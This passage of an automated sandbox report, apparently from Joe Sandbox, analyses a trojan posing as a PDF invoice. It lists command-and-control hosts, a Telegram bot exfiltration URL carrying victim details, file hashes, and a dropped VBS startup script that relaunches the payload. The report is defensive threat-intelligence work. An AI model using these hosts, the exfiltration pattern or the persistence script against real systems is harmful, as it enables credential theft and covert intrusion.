https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 0000000B.00000002.2526741820.0000000002617000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002648000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000008.00000002.2527756944.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000025D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000008.00000002.2527756944.0000000003175000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000008.00000002.2527756944.0000000003061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002500000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000003030000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enP	RegSvcs.exe, 0000000B.00000002.2526741820.0000000002608000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20a	RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000003030000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591868
Start date and time:	2025-01-15 15:01:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice No 1122207 pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 99% Number of executed functions: 47 Number of non-executed functions: 306
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 8060 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:02:11	API Interceptor	3125236x Sleep call for process: RegSvcs.exe modified
15:02:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse
	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://savory-sweet-felidae-psrnd.glitch.me/	Get hash	malicious	HTMLPhisher	Browse
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	q9JZUaS1Gy.doc	Get hash	malicious	Unknown	Browse
104.21.112.1	http://informed.deliverywfv.top/us	Get hash	malicious	Unknown	Browse	informed.deliverywfv.top/us
	http://grastoonm3vides.com	Get hash	malicious	Unknown	Browse	grastoonm3vides.com/
	bridgenet.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	977255cm.nyashkoon.in/secureWindows.php
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	trow.exe	Get hash	malicious	Unknown	Browse	www.rs-ag.com/
	fqbVL4XxCr.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
158.101.44.242	RFQ_AS0101402025.22025_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	nuevo orden.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Lpjrd6Wxad.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
reallyfreegeoip.org	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	1nl3hc.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Contrarre.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	RFQ_AS0101402025.22025_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	50201668.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
api.telegram.org	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://savory-sweet-felidae-psrnd.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	q9JZUaS1Gy.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://telenerh-ogjf.icu/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	http://telegroom-nzj.icu/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	https://ofmfy.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://teiegtrm.cc/EN/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
ORACLE-BMC-31898US	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	1nl3hc.ps1	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Contrarre.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	RFQ_AS0101402025.22025_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	m68k.elf	Get hash	malicious	Unknown	Browse	193.122.239.186
	50201668.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
PUBLIC-DOMAIN-REGISTRYUS	https://qvg.soundestlink.com/ce/c/6783ea8fa36d871b210a875d/678648091eb09f6bc9efe05e/678648224da9c434ec77e1fc?signature=c3a7b24183dde70b3cc2cefa1e1d5f8ff6f1d434aea3b4c4cfdeccd85ad85929	Get hash	malicious	Unknown	Browse	199.79.62.126
	https://tvtsrilanka.com/Agrr/	Get hash	malicious	Unknown	Browse	208.91.199.36
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	http://www.techigent.in	Get hash	malicious	Unknown	Browse	103.21.59.80
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Xre0Nmqk09.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.251.80.30
	8BzIVoQT3w.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	EpH9QFlrm2.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
CLOUDFLARENETUS	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q#support@sealevel.com	Get hash	malicious	HTMLPhisher	Browse	104.21.64.1
	https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	http://petruccilaw.com/	Get hash	malicious	Unknown	Browse	104.17.196.192
	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086	Get hash	malicious	Unknown	Browse	104.17.25.14
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Davx2k2025.doc	Get hash	malicious	Unknown	Browse	104.18.95.41
	Setup_BrightSlide_1.0.9.exe	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	1nl3hc.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Contrarre.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	RFQ_AS0101402025.22025_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	50201668.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	http://www.flamingoblv.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	NZZ71x6Cyz.dll	Get hash	malicious	Wannacry	Browse	149.154.167.220
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	RFQ_43200046412000086500125.vbs	Get hash	malicious	Discord Token Stealer	Browse	149.154.167.220
	0969686.vbe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	NEW SHIPPING DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Invoice No 1122207 pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	278016
Entropy (8bit):	6.957244531730331
Encrypted:	false
SSDEEP:	6144:LsJFQ+09zWF7easTdflEzWMdGZDpWNuABNK:L7Wca8flEPdGZDANu2NK
MD5:	3E6E44775094296CADF99E7D2105A858
SHA1:	7625F84C72B11DB4CFFD0E55494AA2B1E2222F57
SHA-256:	80A70EBBB5349F93251977E5574DC27F51C3E635B52A8DC72CB8DF7CC7DCDDDC
SHA-512:	6FC3862C573C1E7E0BDC7EAD79DF72AA428F1B6B24A0F56B53030688E02B6A0EAAAF546DCA45E8844A3664A7C7D42A830CC7FA2E1562F20C5CAFDB3F3150ABF5
Malicious:	false
Reputation:	low
Preview:	~m.2EEQA\SN8.HL.37X2FEQ.XSN89OHL937X2FEQAXSN89OHL937X2FEQAX.N89AW.73.Q.g.P..r.PP<h<K\PS+e2 6=!L.--lKFYx[(e...s#W]fA49.X2FEQAX..89.IO9.\ UFEQAXSN8.OJM22gX2nAQALSN89OH2.77X.FEQ!\SN8yOHl937Z2FAQAXSN89KHL937X2F.UAXQN89OHL;3w.2FUQAHSN89_HL)37X2FEAAXSN89OHL93..6F.QAXS.<9XXL937X2FEQAXSN89OHL9.3X>FEQAXSN89OHL937X2FEQAXSN89OHL937X2FEQAXSN89OHL937X2FeQAPSN89OHL937X:fEQ.XSN89OHL937vF#=%AXS..=OHl937p6FESAXSN89OHL937X2fEQ!v!=JZOHL.#7X2&AQAJSN8.KHL937X2FEQAXS.89.f>\_X;2FIQAXS.<9OJL93.\2FEQAXSN89OHLy37.2FEQAXSN89OHL9378tBEQAXS.89OJL<3..0F=.@XPN89.HL?.Z2.EQAXSN89OHL937X2FEQAXSN89OHL937X2FEQAXSN89O.1.<.../6..XSN89OIN:71P:FEQAXSN8GOHL.37XrFEQvXSN.9OH!937\|2FE/AXS089O,L93EX2F$QAX.N89 HL9]7X28EQAFQf.9OBf.35p.FE[Ar.=.9OB.837\AeEQK.QN8=<lL99.[2FA"dXSD.=OHHJ.7X8.@QA\y.8:.^J93,7.FE[A[.[>9OSf.35p.FE[AruN;.ZNL9(.z2D.XAXWdnJRHL?.tX2L1XAXQ.29OLf'1..2FO{c&XN8=dHf.M;X2BnQkz-C89KcL.-5.?FEUkz-@89KcL..IW2FAzArML.6OHH..IH2FAzArq0)9OLg9..& FEUjXylF*OHH.3.zLREQEsSd.GZHL=.7r.8SQA\xN..1_L97.X.d;IAXWe8.QJ.!37\..E/#XSJ.>1

C:\Users\user\AppData\Local\supergroup\ageless.exe

Download File

Process:	C:\Users\user\Desktop\Invoice No 1122207 pdf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1586176
Entropy (8bit):	7.403541769261858
Encrypted:	false
SSDEEP:	49152:0TvC/MTQYxsWR7a98rj1xQdK6xKXbo7Q:UjTQYxsWR/MnKXmQ
MD5:	F4D3B326B29B4D0D8269499BE0BC6B7F
SHA1:	F64F81909454B15DBA91E95D5DA9D7684CFC59F1
SHA-256:	C3290E5CF7EBC77727F778129C3E235BBB23BDF2CC6136E4A442E7034DA7ABE5
SHA-512:	553CF511061E2862E8218EC0FF8A34C9CF5EFAFE7B7C4BA3B07A0C105D5E238A17E697A5582B7D825CF065566B26666F48A2DCD59096FC64C5CF40EB90CEA50B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......g..........".................w.............@.................................v.....@...@.......@.....................d...\|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Download File

Process:	C:\Users\user\AppData\Local\supergroup\ageless.exe
File Type:	data
Category:	dropped
Size (bytes):	274
Entropy (8bit):	3.3988741536694866
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclq7UEZ+lX1WlQfSMlm6nriIM8lfQVn:DsO+vNlq7Q1zakm4mA2n
MD5:	FD7F0BFB3B154E251C51D95121B7402E
SHA1:	7AEB1D01DA3E9B15C68989F469BEBC3389E62FA8
SHA-256:	06111E35A3B26AB871609F52DB7A40E502CDFEB70F53185118E128E95F71FFF1
SHA-512:	E11EA83F4236CCE3FE00B84632EA252238DD85200DC99DA435ECBC49B603716355A6FA5A4B70FBD93EA9810BB0EA942CB4580B397CFFE5E9877ED81EC7ACDF9D
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.u.p.e.r.g.r.o.u.p.\.a.g.e.l.e.s.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.403541769261858
